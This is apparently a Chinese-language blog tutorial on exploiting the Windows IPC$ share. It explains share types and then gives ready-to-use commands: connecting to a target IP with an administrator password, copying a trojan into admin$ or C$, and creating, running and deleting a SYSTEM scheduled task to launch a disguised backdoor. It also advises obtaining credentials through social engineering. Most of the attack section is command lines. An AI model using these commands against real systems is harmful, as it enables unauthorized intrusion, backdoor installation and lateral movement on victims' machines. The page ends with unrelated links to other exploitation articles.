IPC$漏洞利用简介

  • 1.关于Windows操作系统中的“共享”
  • 2. 利用条件
  • 3.IPC连接建立与攻击尝试
  • 5.常用命令

1.关于Windows操作系统中的“共享”

在Windows操作系统中的共享有3类:普通共享、默认共享、IPC$共享,

  1. 普通共享:就是通常意义上的共享,即用户设置的共享目录、共享文件夹、共享分区等;

  2. 默认共享:Windows操作系统的隐含驱动器共享,通常有:

    (1)驱动器共享:如C$D$,开启后可直接访问分区中资源;

    (2)系统管理共享admin$:通常指向C:\Windows

  3. IPC$共享:这实际不是共享,而是提供一种访问管道;IPC全称“Internet Process Connection”,顾名思义,是为了进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。

查看服务器所开放的共享,可使用命令:net share

2. 利用条件

  1. 开放了139、445端口;
  2. 目标开启ipc$文件共享;
  3. 获取用户账号密码。

3.IPC连接建立与攻击尝试

  1. 首先,目标服务器上必须启用了IPC$,启用命令: net share IPC$
    当然,目标服务器上启用的共享对入侵者而言,多多益善。

P.S. 删除IPC$命令:net share IPC$ /del

  1. 在入侵者侧,首先须建立与目标服务的IPC管道连接,建立连接命令如下:
net use \\目标服务器IP地址\IPC$ "口令" /user:用户名

P.S. 如口令、用户名为空,则建立了所谓“空连接”,这种连接权限有限,仅为everyone级权限;因此,建议在通过社会工程等手段获取用户、口令后再尝试。

  1. 建立连接后,用net share \\目标服务器IP地址查看目标服务器所开放的共享资源,也可以直接尝试上传或访问某个共享(例如:admin$)、确认是否有可以利用的资源或信息;

  2. 尝试攻击:将木马或其他工具上传至目标服务器的共享目录,比如:

copy 工具.exe \\目标服务器\admin$

然后直接或定时(利用at命令)运行工具.exe,完成攻击。接建立与攻击尝试

# 查看目标机器时间
net time \\193.168.1.12
# 创建该时间之后的某个时刻自动执行任务,任务名 plugin_update
schtasks /create /tn "plugin_update" /tr c:\windows\temp\plugin_update.exe /sc once /st 16:32 /S 193.168.1.12 /RU System /u administrator /p "1qaz@WSX"
# 如果不想等,可以立即运行后门程序
schtasks /run /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"
# 删除创建的任务
schtasks /F /delete /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"

5.常用命令

# 1.连接
net use \\193.168.1.12\ipc$ /user:administrator "1qaz@WSX"
# 2.查看连接情况
net use
# 3.查看目标主机共享资源
net view \\193.168.1.12
# 4.查看目标主机时间
net time \\193.168.1.12
# 5.查看目标主机的NetBIOS用户(自己本机也需开启)
nbtstat -A 193.168.1.12
# 6.删除连接
net use \\193.168.1.12\ipc$ /del
# 7.文件上传下载
copy plugin_update.exe \\193.168.1.12\c$\windows\temp\plugin_update.exe
(上传到目标的:c\windows\temp\目录下)
copy \\127.0.0.1\c$\test.exe c:\
(下载到本地c盘下)
# 8.创建计划任务
schtasks /create /tn "plugin_update" /tr c:\windows\temp\plugin_update.exe /sc once /st 1 6:32 /S 193.168.1.12 /RU System /u administrator /p "1qaz@WSX"
# 9.立即执行计划任务
schtasks /run /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"
# 10.删除计划任务
schtasks /F /delete /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"

IPC$漏洞利用简介相关推荐

  1. redis 漏洞利用与防御

    前言 ​ Redis在大公司被大量应用,通过笔者的研究发现,目前在互联网上已经出现Redis未经授权病毒似自动攻击,攻击成功后会对内网进行扫描.控制.感染以及用来进行挖矿.勒索等恶意行为,早期网上曾经 ...

  2. metasploit 快速入门(三) 服务端漏洞利用

    目录 简介 01 攻击Linux服务器 02 SQL 注入 03 shell类型 04 攻击Windows 服务器 05 利用公用服务 06 MS17-010 永恒之蓝 SMB远程代码执行Window ...

  3. Sundown EK:漏洞利用工具中的抄袭大师

    简介 Sundown是目前市场上最新款的漏洞利用工具,而Sundown的作者也成功地证明了自己其实就是一个抄袭大师.不知道这种"借鸡生蛋"的事情被曝光之后,还有用户会买他的单吗? ...

  4. 从CSRF原理到CMS漏洞利用

    文章目录 0x01 基础知识: 1.CSRF漏洞简介: 2.与XSS的区别: 3.攻击的细节: 4.常见的攻击类型: 4.1.GET类型的CSRF: 4.2.POST类型的CSRF: 0x02 CSR ...

  5. c++ 跳转到上级目录_Windows漏洞利用开发 第4部分:使用跳转定位Shellcode 模块

    概观 在第2和第3部分中,我们构建并改进了ASX To MP3转换器的一个漏洞利用.尽管它存在缺陷,但就漏洞而言,它非常简单直接-- 直接利用指向我们shellcode的寄存器从而直接跳转到EIP覆盖 ...

  6. ThinkPHP V5 漏洞利用

    ThinkPHP 5漏洞简介 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞.该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有 ...

  7. linux内核提取ret2usr,Linux内核漏洞利用技术详解 Part 2

    前言 在上一篇文章中,我们不仅为读者详细介绍了如何搭建环境,还通过一个具体的例子演示了最简单的内核漏洞利用技术:ret2usr.在本文中,我们将逐步启用更多的安全防御机制,即SMEP.KPTI和SMA ...

  8. Kali Linux 秘籍 第六章 漏洞利用

    第六章 漏洞利用 作者:Willie L. Pritchett, David De Smet 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 一旦我们完成了漏洞扫描步骤,我们就了解了必要的知识 ...

  9. 苹果零日漏洞利用市售800万欧元

    苹果移动操作系统iOS零日漏洞利用可致远程代码执行,市售800万欧元. 苹果零日漏洞可造成巨大破坏 由于以色列网络情报公司NSO Group备受争议的"飞马"(Pegasus)解决 ...

最新文章

  1. 语音识别wav2letter++简介
  2. IS服务器下做301永久重定向设置方法
  3. Nginx Install 记录
  4. 利用向量叉积求三角形的面积(+STL:nth_element求第K大的数)
  5. 2020年第十八届西电程序设计竞赛网络预选赛之Problem C 没人比我更懂 COVID-19
  6. P4879-ycz的妹子【分块】
  7. 【转】使用websocket-sharp来创建c#版本的websocket服务
  8. 各种排序(数据结构复习之内部排序算法总结)
  9. 一起来学习丨听海华大赛第一名团队聊比赛经验和心得
  10. 不同于其他写脚本的同类文章,使用软件取消赞和关注收藏
  11. C语言第12轮:指针
  12. poj 3211 Washing Clothes
  13. Jquery实现的几款漂亮的时间轴
  14. (6)Redis的高可用方案
  15. Matlab中的滤波器
  16. python代码在哪里写_python的代码写在哪里,怎么样运行python代码
  17. 商城类小程序,拼团、砍价、秒杀、预售,一套源码全搞定
  18. Instagram for Business Instagram商业技巧 Lynda课程中文字幕
  19. 如何画 软件工程 流程图
  20. 关于尾注的一些问题-上

热门文章

  1. 标贝科技|智能语音助手+全息形象,会是下一个趋势吗
  2. 隐形的翅膀怎么用计算机弹出来,《隐形的翅膀》原版吉他谱分享,用音阶指法弹简谱其实很简单 ... ......
  3. C# 项目--更换用户头像,使用相对路径
  4. [转] 一篇好文 ---steve jobs (stay hungry, stay foolish)
  5. 计算机系统基础 - Lab1
  6. php+mysql一个简单的图书管理系统设计思路
  7. 小程序之日历(状态版)
  8. 自动图片拼贴制作软件:CollageItnbsp;…
  9. 详解CSRF跨站点请求伪造
  10. 革文:B2B企业如何用品牌思维玩转社群营销